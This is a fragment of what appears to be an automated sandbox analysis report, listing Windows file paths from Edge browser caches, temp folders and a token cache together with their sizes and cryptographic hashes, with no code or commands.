SHA2566053dafe2f9cedf98a23b12ddcc3d27a8a7705853785cbf7114c6c9b30469430
SHA512b57aae0aaae54c05594b300553178aa91bf8741e205c4d7df3c02705ce33ac9b3d28bb0f1cd49f17a97e74a9a5db158ca0d55373c712562690fb2e1531589d5a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize250B
MD5e8f139b9640eb87e61f1b9d5e601980a
SHA136b9548c802aad5700feba99b1b2b5659d156da3
SHA2565cebe8f41b6c96e718b4f5da71323932d24fb1b0ac5746e1353c8d9908db4252
SHA512340bcafbaaf6af318abc0907aaefc2d6e899e32283bdac6e7c097f656c64471306990b855b8c928f5f00fd4745b4f85e080342cf7f2705d7220972e254277d9c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\index.txt
Filesize248B
MD5de536f88d362eee15255fa9ef5c7ed75
SHA1a26b3bd96a9736e61144cb6ba81f8b15922abbb1
SHA2565eaceef7293797b19c6a812ad3077a3f949dce38137d54ce8346010d7c4808fc
SHA51265710e38b1de87503c9d47c2673c1020c05dcd28f103d4432e2f18477687a696d6e911b343e9d01e3a70dfa0673211e735b4a52059055e75f90f57c59f9795b3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize48B
MD50a817d4b870afc88ddf30bf996a21597
SHA1e5fb7c48b53952e3767ef0e4a0259e82c65e14fe
SHA256cdf8e2306b06fa8bec6aa3c012c5eb7fa7a805e361c0ba66cfc701b34ac32b18
SHA512e7e8ccbdd21e0bbe5205ce170ccae32c23a0fd9525750c694e696f309fc3c7151c32989c99e74d0ff4d1ad7e6576d42b9b21e783fff530bd9ecd5fd97343dfa6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize48B
MD583f002a8d4716350173737678623d9fd
SHA1b9fdd3d98869265e7efecffa6c2a225a6b98d444
SHA256e0beaa770d209a9de73e6eeb2ba58c11d51133028293e25dcc9a5c33fabde837
SHA51220fe6eebf4bd597060eee943e39fc7f5419ca5394fa65d317e637f38333a9c07f115aae9e2606f2ba2e8a55d5a801eabea062255d1ac97ee0128b20c2f117555
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize48B
MD5994ac86b095d8a134590514f0be9840c
SHA13d229c91316b61d7d80fa6d6659fe18b3f334ca3
SHA256d7f048f6801a5ed19de632d3f42a4fd2936246443d58e71fe1955bb92f0780b3
SHA512a3f5826412e9a74bf1239ee949ba5ce89f73eb79de6ced1ba25537a521cfbb50338917661b9eadcf4475b9d2685dcb3363b0843728c7a8152f945d4504365c9d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe59718c.TMP
Filesize48B
MD576872d85cad513c853411c0510fc0567
SHA1cbdd89c41e7c9af1d29cc1bd35f9950b52f98cef
SHA256871025b83988012ada8bff5a66f35e52b8de82e91a037b8954437c8f07d06b7f
SHA5124877874e1e2a2fa1464aef624f4b88bf0b4da0fe8f2ab5c41212f1a9a2fa46f1446464630e18a61b615c05e4a8f9f057a414544aece8dbd64f19ea8d5de681cd
-
Filesize
41KB
MD5f5752e1cb31c6b896d38c356e27a07d8
SHA1ab30487ab7e8458ce9c7e57658e9678680135804
SHA256041b0245ca0ec9e2e8f4f7d89fde29d8f343546591e219b37d92bcf3b5b99c89
SHA512edd4672b05c390af1a257e77bf0edd7ded577d8063980191d253534b703a26cbc7a7e1d0fca60091eca98653d64610bde568571c5b08e94e9c4d24d9ef462d6f
-
Filesize
4KB
MD5bed6d23a1be8b93aea259c987af8109d
SHA1f544c360d93ce1d30c82aae4d2b0b1ba122bcfdd
SHA25644f499d0d6c2b9d48c559eb19bbc5b53151c01bb2568afbd8a08d1e588106892
SHA51261c1f3175ab4706d76750e32a084c509392a1eda7dc848f31ded2f0346b73b83d85ac4f567eec576eaf200148d7e2bb425196e9319297fb986f1814c605572aa
-
Filesize
876B
MD52fc94ad1ff1f01f8081e757e92fb3409
SHA1359e2e57c52d75d107df7dc811a86ef8ac916fe5
SHA256dd762f917b13bd15b8934b84690c66f1d6f190e4f777ac69e3222b99bae79628
SHA5126279c391cdfe58e196f53617e99967e3950b716f01eac759d40a80eb4dbf3d181bdd44eb345968eb1efeb508b0f54827d8ec7e30db9848aeec9c35e4f0c2dbe9
-
Filesize
23KB
MD5ff2f0a39019a0a495876ed8909382612
SHA1fba8c4eb779a8248a368873574dc88298a59bfd6
SHA256d496e3356a4b8618d789bcc64d19eb4bc232f9dbc8a11cd690cc3f67e54d3fe6
SHA5123e7ddee004c3a37b3170adf6c5ae7f561592db8fac8501054b5b4310c9febeed94d95d3ee5bf14435460e7c60df894077692ea7917ca643d00ac12c987160993
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog~RFe5a133b.TMP
Filesize467B
MD529b4ab339d24906afa24764eb2a61bff
SHA1a926f1b1a92f7679d527eea96b7d019c2862bacc
SHA256a5d8108f1b0501b319cb305b3be46dbc0e7613a551b18174eb0a0c891ea4b033
SHA512a92feedf464fafeddf3086a448b3322dd9d7d16257768ebed7ef8b162dfebf559b500d1e1d077d9decf796786792178a7fcf0eceee9284e48387d79d30450b11
-
Filesize
18KB
MD5c9e6afd79adfccde1a80d46e007af60d
SHA1a74e3ac72c4d44a21ce32a7178db324ed968e988
SHA256c4dad73d1ae5ac30184d22f0a7d380bd9f0f2ec6cfac8dfa21379140fd22b7ec
SHA5120d6ae366e684f4f11e4363acd5b63e93fbc09e445d815f37617e96512aaf7abb572862c11a5d7b8198aac910a28c0d3bf3a87fb03ca5048cff4cbbd8945506e7
-
Filesize
12KB
MD5d5ea1c0e44256c93b5d1833252736e56
SHA1f2b5e70e00bf4283c1b4d8d498737ef769db7f7b
SHA256a86d1c095283ec4690dcf9c7a0726d31e612d1adb37cd424a273ebe84f210042
SHA5122a7b20bbc9b78806a325916ade3bfebb8d8f7643d880d66353f6d83e5bf397b91e9bee50d826976fe46db481fd379f751f1838602984bf467701a8fee9427bf5
-
Filesize
6KB
MD50dad5bd16183d59eb2446ef7c7f730f5
SHA104628f9849792bde3c4fe92e2f45049b0b719f98
SHA256ed6fce881413b6a2148ed70f1b1315c4b7ac0003065ea6951cdab2bb61f91381
SHA512cc285061e21bb70a91af13e103bff5d4e0aca31b6a7ac4f1fa35d85d4eca29950cb29e705d766cab80d5c11f10f76aff2db6f73bf6fd5bd3ebc267e2a3b78708
-
Filesize
27KB
MD5c68ad477ec40abbaffd36a023719d9dc
SHA14ac11fab0a19c92609719a74271e2682ede4c2c3
SHA25694d5ee1ceafb0ce8df303e212edc9c817905cd85bfacdcb9787ed02bf3ce21db
SHA512ca7bd6e42fef0725ec6dd64eeaba87e079ebf65ac3a8359e7bdf0daed5b9129bfc16252884b1b42c7b21415380adca611d9049343e19a22194989e9d02513f43
-
Filesize
27KB
MD5a352f09efb6527fd27a9484e211a59a4
SHA11bf5e8083b118af216452b2862e4c0591a2c6372
SHA256548f0674d62f3f762444aeb37cf69fe5bfaad3eb12569c5cd5ed294fa0110fbd
SHA5122ddb7e5cb620a1a86fe8b0d8a21aac280a48587b994aebf394f8f5695f9c0db2b4cf76fd0d357745087bd9e311c2c2c419d87c6c9d480a740d974b711ac761c8
-
Filesize
27KB
MD5834cef749010ed95e47aad45799d279e
SHA1ce3f0bc008d20aecc572988f66b39634b91e51db
SHA256b87df585bb0f8b7eb38a1f1996a004d0d15ae254d48100c01c7abb373d1b38c7
SHA51292ac4afbf68303d4a0cc35ae1cb240d58f69b42122e7b1ba88acbff82b13c3535bc442290fedad7be55f2ec79c841a29d9e63b34490a832968b0950cea35a2ef
-
Filesize
27KB
MD51344ad9c8ccccbd0c39e69b67354d7c1
SHA1c06c81d039d6352c7778ffcd0b52c8f81c77cefc
SHA256c469a680de18421ffad7ea6a0e7318c5b71746c6f2485f19406fd4f5d9deaab3
SHA512f8a901315f3b90e829b3c80c5acff824ba32c28edeb97a0fb94e25727df0960acb4c9b00b18662b1e8933a0a083d5ad8dec8912d4c35a5ece351dfa37fe35de5
-
Filesize
27KB
MD5293d96db7457443357ef6c8c8f7646ea
SHA1a782caea0e47183beacd995321bea9d4c58c2617
SHA256d325b416d23a1c5e65c314a715e87dfc571c3b20818e7019399160ffc80365fc
SHA5120ce2333b397e128894152a41640aebe13e6789eaa743c19add41ed0fd43bd4eb9aa4ab99183209a20ce8e670561b2f15dc5686b28abe25355a1e68e2b3d0552e
-
Filesize
27KB
MD543d0a5cec18379cb0cf8c28fa957b3cb
SHA1f1720f1df54bf8a1249132fab051e92bcbd93973
SHA256710d0fb7f8ade8b3a766a218be32304817caa5e903795dca6ef471c4e6d22fb3
SHA512328ecc5a4a56828b02d5fa723a3b528b977dd1155a52b14135a9f76bd57e91ed7c0baa3d4072c7539aab8d625fa551b7a46ce1b74508698f3420711db0648eb4
-
Filesize
27KB
MD5544c95cda816e8f64662bc57b5430969
SHA1459bcec51ea616cc7dc084919c03ee3370748d36
SHA2565dccb506a8558f1af9ff196dcd161b58dd058fb3721a0896ba098491d2225104
SHA5121bf8520c980a79079f32f6b3082132640a03f8a6cf63dde3a503b871e8e0665ca6e64f5d667870a8287e8f0dc1a51c3e0e3ea1651af4e5d161436a14bdc719c4
-
Filesize
13KB
MD5e2583fa93b763c0fd2e98e7b3df7c236
SHA1916bd74a33ce714c1b84b55396967cfc3adf2965
SHA25692d896570453230cc0e22506b8a337dad7835a9bbbbb8716ed3f0757eb9ff2cf
SHA512db7779ff14e77f0566de5f92620c8656e35d96bd357d1ca8302dc1e3d3e46f6ccf488b72e6893da4c69cc1b565fe41b7c24f6a3951f7997e7e8cd0640329634a
-
Filesize
27KB
MD57c3d03a0d3bc1c74151ca0de3633dddc
SHA1af0470939903dfb257fed6d32eb04eb62b83962d
SHA256b4da35c0513cd4f27907641b2ee066556b6544967e1e66f164d2ec32f97b4e81
SHA5125095f5edb09aec71e397a371377962f5e72084af3bb1aee2c751710e5600bf3ff8b9ec15000b61ada5291528c146a14094cf07951c62e8ed3dabce3ed15968a7
-
Filesize
18KB
MD51c7fb2adcf482b0780913995b98153ba
SHA1008e5e029655f9dfab4c5d216dc1b2ae61d0ba67
SHA25614cc8ed98df2569829ee2a3a649fce34eaff413b0aa8b0bbac19bc5b5c53f444
SHA512dc83c7f426df51d1520857b7469c354dfef85b4ce5fad5a2d6930c61de8d02c8a7fb24351222dd4e93aee6b64ec04ab4d20b3f563c62a6e931fa61a32b763e91
-
Filesize
7KB
MD55ffa84f25cb6c52c4d5a2ed0bbb1703c
SHA16069cb478fdcdb2951d98402da4a8df4f4fd72e8
SHA2566af983003ebd3e2799c350e88810f882e265d3245f8d5d2f48b379e4ba0a9afa
SHA51219f28b8b7a08d85b4cbd9b143bc4ea25a2ce1857082dca0946a9eaf88438f21239875a7f1b3eb6de1f1af2857b65938877703a8d94f95e3f89663e6d54697c22
-
Filesize
392B
MD521d15feb1ea736b1720d5db896f6d949
SHA18f252d45bd558237c09273e33dfec8c2f26cb25e
SHA25658dfe52767044122260066ef24170ee7729099e16cecdf578b6ed138dce1e84a
SHA5121afba9a2f88174cdc47a331b8a5991733b868d41b8ed4e6c164d15972c3af223748f79deb452f77df4868071d075e69a9407a3046ad754a195181e174f04eb9d
-
Filesize
392B
MD500b0d834c637a56e70427f9ddc1262db
SHA1ff96a373b038902be0d5fb0bee8d031df8485097
SHA25615774e4bd006b5302503ad1d39a0291f2d99abb580159516fa3758389c9bc2dd
SHA5124bdb1ce331a2d2d793d411f5ba986cd067aecf93421d958d8622d92b33e4c16c8d6acf6ffde5c82c5b6dea443529151b5d04969141c589bbb24f9f39d596772d
-
Filesize
392B
MD5a1d3fed74be2a0e25db5c524bf7fd07b
SHA179ad7803edb036a5412214c0adee614ca1826e5a
SHA2564c58a3d3dc364cd2f608eb0c2fe0a361c29f3834100b93daf31ae75be5e1da47
SHA51290faf28346a3069b3477b8384c104d00c4366977f7c30aed45d09ebf4f5faa4390b4b27c1361aaec469beb590880ac7be4b6e4581a3061bec7e18989d56692ff
-
Filesize
392B
MD5eec36041b767904b29e6425095364d2e
SHA18ad6abe16c11450442e7a6525342ad4aaa5a0316
SHA256213a8b0efce89bbad99859c8e1c31f5c4f005328f5ba5cb948b226d16ae18dd2
SHA5125ef95fd4b55cd3eb6c017a08c67b81e8ce2dd9dc6eda4d5546008f48c9e08e6bf8ac11910d8053f06a6187117a30c3e03b67ff5daacc9e76eda9da799cecc417
-
Filesize
392B
MD519de70d5e17636ee34c8f100d309d037
SHA15ee4381fd89d7684d0d42068a2f7074bb9e29324
SHA25688546421b05a8cd4dcad7a1b8a49c70dc258fe73a31200038a69bfde61a683f7
SHA5124303d2782f4939319fec082be4cd189f17d2c72afd9a1e775fc1bca70ee17af43353c85b286fe57896ca472cbfe6dcdd8d055b08083a4f76d5ac58839d07b19a
-
Filesize
392B
MD58ef0d2f452435ef51cda0ce795a1d6c7
SHA174467d983cc3db67a2cd15cc2473cfee241b08ec
SHA256add3b0964341c96c685d03d6843979b063ae675d731b89757369e59129039727
SHA512e65c27e7165139694ee3e04414bd66b270cbdac72dbbaee6b3899ebf78f3f07254951a1bfe1097823d41c0d0a151f18726394598db76e165d3c4c5ebd1075382
-
Filesize
392B
MD548ab2c83818018927fc17a9b117af11e
SHA14b601be092d3467dbb593e971d919015322859b2
SHA25666c9dba0faa47fb3fb08fcb6768e1cf42e514fb4f62206924c022cd9593e36e5
SHA5122cf9a72fb68a24d1847603f15c971548b714072ba64055a222d41285d0b370d829f7afadc99025f2fb71ea2ea67da863ee4f080fbb70c79e6955409f0ae7492c
-
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
Filesize2KB
MD57147f1abda8b433f4f2655bd3c16913f
SHA1e3e2bf0480debcb14788f26157ac28902933e093
SHA256a5bdda557b40b81d4818cc45c22e7c4ed02bdd09ef990a2b6d1d479c66e5f7b0
SHA51247b3edefa9225947e4f0c40237d5119758824bc57f7dd6fa3ae38cb9923f3091aaf680a6a43bc93f976031686ac757790b3581be14ffbfb04bd01d7f076b30a0
-
Filesize
1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Temp\scoped_dir5424_1469184474\bd2887ba-fc67-4efd-9ee6-c8a0d8c5f51f.tmp
Filesize152KB
MD5dd9bf8448d3ddcfd067967f01e8bf6d7
SHA1d7829475b2bd6a3baa8fabfaf39af57c6439b35e
SHA256fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72
SHA51265347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de
-
Filesize
10KB
MD578e47dda17341bed7be45dccfd89ac87
SHA11afde30e46997452d11e4a2adbbf35cce7a1404f
SHA25667d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550
SHA5129574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5
-
Filesize
797B
MD5afa18cf4aa2660392111763fb93a8c3d
SHA1c219a3654a5f41ce535a09f2a188a464c3f5baf5
SHA256227082c719fd4394c1f2311a0877d8a302c5b092bcc49f853a5cf3d2945f42b0
SHA5124161f250d59b7d4d4a6c4f16639d66d21b2a9606de956d22ec00bedb006643fedbbb8e4cde9f6c0c977285918648314883ca91f3442d1125593bf2605f2d5c6b
-
Filesize
414KB
MD5c850f942ccf6e45230169cc4bd9eb5c8
SHA151c647e2b150e781bd1910cac4061a2cee1daf89
SHA25686e0eac8c5ce70c4b839ef18af5231b5f92e292b81e440193cdbdc7ed108049f
SHA5122b3890241b8c8690aab0aed347daa778aba20f29f76e8b79b02953b6252324317520b91ea60d3ef73e42ad403f7a6e0e3f2a057799f21ed447dae7096b2f47d9
-
Filesize
315KB
MD59f8bc96c96d43ecb69f883388d228754
SHA161ed25a706afa2f6684bb4d64f69c5fb29d20953
SHA2567d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5
SHA512550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6
-
Filesize
224KB
MD55c7fb0927db37372da25f270708103a2
SHA1120ed9279d85cbfa56e5b7779ffa7162074f7a29
SHA256be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844
SHA512a15f97fad744ccf5f620e5aabb81f48507327b898a9aa4287051464019e0f89224c484e9691812e166471af9beaddcfc3deb2ba878658761f4800663beef7206
-
Filesize
431KB
MD5fbbdc39af1139aebba4da004475e8839
SHA1de5c8d858e6e41da715dca1c019df0bfb92d32c0
SHA256630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
SHA51274eca8c01de215b33d5ceea1fda3f3bef96b513f58a750dba04b0de36f7ef4f7846a6431d52879ca0d8641bfd504d4721a9a96fa2e18c6888fd67fa77686af87
-
Filesize
1.0MB
MD5055d1462f66a350d9886542d4d79bc2b
SHA1f1086d2f667d807dbb1aa362a7a809ea119f2565
SHA256dddf7894b2e6aafa1903384759d68455c3a4a8348a7e2da3bd272555eba9bec0
SHA5122c5e570226252bdb2104c90d5b75f11493af8ed1be8cb0fd14e3f324311a82138753064731b80ce8e8b120b3fe7009b21a50e9f4583d534080e28ab84b83fee1
-
Filesize
184KB
MD5c9c341eaf04c89933ed28cbc2739d325
SHA1c5b7d47aef3bd33a24293138fcba3a5ff286c2a8
SHA2561a0a2fd546e3c05e15b2db3b531cb8e8755641f5f1c17910ce2fb7bbce2a05b7
SHA5127cfa6ec0be0f5ae80404c6c709a6fd00ca10a18b6def5ca746611d0d32a9552f7961ab0ebf8a336b27f7058d700205be7fcc859a30d7d185aa9457267090f99b
-
Filesize
236KB
MD5cf1416074cd7791ab80a18f9e7e219d9
SHA1276d2ec82c518d887a8a3608e51c56fa28716ded
SHA25678e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df
SHA5120bb0843a90edacaf1407e6a7273a9fbb896701635e4d9467392b7350ad25a1bec0c1ceef36737b4af5e5841936f4891436eded0533aa3d74c9a54efa42f024c5
-
Filesize
590B
MD5614313596d4ce914e51592bef6c07d6d
SHA1674e83084b7bf5336019bb5d48ba2e0c606f4fe6
SHA2561605082d68dcf087d014420a27d4a8564c926d5bdee3de2d7e7fc2066631381b
SHA5127749918c2e07862892d47274e3ac8e5abf19a2c8ccb28e3599dd5307db67f420f850e617c7667843385caf5c703a516c76b04dd1f57d91452c5fac994c1bbbbd